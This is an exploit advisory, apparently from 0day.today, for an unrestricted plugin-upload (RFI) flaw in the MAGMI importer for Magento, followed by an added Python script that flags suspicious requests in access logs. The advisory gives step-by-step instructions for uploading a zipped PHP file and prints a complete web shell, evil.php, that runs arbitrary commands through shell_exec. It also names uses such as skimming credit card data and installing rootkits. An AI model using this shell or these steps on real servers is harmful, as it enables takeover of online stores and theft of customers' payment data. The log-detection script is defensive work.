Magento Server MAGMI Plugin - Remote File Inclusion Vulnerability

Published: 26 Oct 2014 00:00:00 | Reported by: Parvinder Bhasin | Type: zdt | Source: 0day.today

Magento Server MAGMI Plugin - RFI Vulnerability, 10/24/2014, Parvinder Singh Bhasin

Exploit found date:  10/24/2014
Security Researcher name:  Parvinder Singh Bhasin
Contact info:  [email protected]
twitter:  @parvinderb <scorpio>
 
 
Currently tested version:
Magento version:  Magento CE - 1.8 and newer versions
MAGMI version: v0.7.17a and greater
 
MAGMI (MAGento Mass Importer) suffers from a file inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files, etc. Essentially, this gives an attacker the ability to execute remote commands on the vulnerable server.
 
Even though the plugin is not Magento's own plugin, I feel that since Magento's commerce platform is used by many sites for conducting business and a lot of their customers could be using the same plugin, Magento has the responsibility to inform its paid/unpaid customers of this vulnerability. I would appreciate it if my name appears as part of the disclosure.
 
Steps to reproduce:
 
1.  http://<a magentosite.com>/magmi/web/magmi.php
2.  Under "upload new plugins", click on "choose file".
    MAGento plugins are basically PHP files zipped, so create a PHP shell and zip the file. ex: evil.php; ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.
         
         evil.php:
          
         <?php
            if (isset($_POST['command'])){
                echo "<form action='evil.php' method='post'>
                <input type='text' name='command' value=''/>
                <input type='submit' value='execute'/>
                </form>";
    
                if(function_exists('shell_exec')) {
                    $command=$_POST['command'];
                    $output = shell_exec("$command");
                    echo "<pre>$output</pre>";
                }
            }
            else {
                echo "<form action='evil.php' method='post'>
                <input type='text' name='command' value=''/>
                <input type='submit' value='execute'/>
            </form>";
            }
        ?>
          
3.  Your malicious evil.php file is now extracted. All you then need to do is access the evil.php page at:
    http://<amagentosite.com>/magmi/plugins/evil.php
     
    At this point you could really have access to the entire system: download any malware, install rootkits, skim credit card data, etc.
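A defender-side check for the upload-then-browse sequence in the steps above, as an added example that is not part of the original advisory: a Python script that parses access-log lines and flags direct HTTP requests for PHP files under /magmi/plugins/, marking those preceded by a POST to the plugin upload page from the same client. The two paths come from the advisory; the log lines, the 30-minute window and the function names are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample web-server access log (combined format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Oct/2014:10:01:02 +0000] "GET /magmi/web/magmi.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Oct/2014:10:01:40 +0000] "POST /magmi/web/magmi.php HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Oct/2014:10:02:15 +0000] "POST /magmi/plugins/evil.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Oct/2014:11:15:00 +0000] "POST /magmi/web/magmi.php HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
192.0.2.5 - - [24/Oct/2014:12:00:00 +0000] "GET /magmi/plugins/extra/x.php HTTP/1.1" 404 210 "-" "curl/7.30"
"""

# Fields we need from a combined-format entry: client, timestamp, method, path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_ENDPOINT = "/magmi/web/magmi.php"   # page hosting the "upload new plugins" form (from the advisory)
PLUGIN_PHP_RE = re.compile(r"^/magmi/plugins/.*\.php$", re.IGNORECASE)  # where uploaded zips are extracted
WINDOW = timedelta(minutes=30)             # assumed look-back for a preceding upload POST

def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]   # drop any query string
    return rec

def find_plugin_php_hits(log_text):
    """Flag direct requests for PHP files under /magmi/plugins/ as (ip, path, correlated);
    correlated is True when that client POSTed to the upload page within WINDOW beforehand."""
    last_upload_post = {}  # client ip -> time of its most recent POST to magmi.php
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT:
            last_upload_post[rec["ip"]] = rec["ts"]
        elif PLUGIN_PHP_RE.match(rec["path"]):
            prior = last_upload_post.get(rec["ip"])
            correlated = prior is not None and timedelta(0) <= rec["ts"] - prior <= WINDOW
            findings.append((rec["ip"], rec["path"], correlated))
    return findings

if __name__ == "__main__":
    for ip, path, correlated in find_plugin_php_hits(SAMPLE_LOG):
        print(f"{ip} requested {path} (preceded by upload POST: {correlated})")
```

Legitimate MAGMI use never fetches files under /magmi/plugins/ over HTTP, so any hit there is worth a look; a correlated hit reproduces the advisory's sequence exactly and should trigger a review of that directory for files that are not part of the installed plugin set.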

#  0day.today [2018-01-11]  #
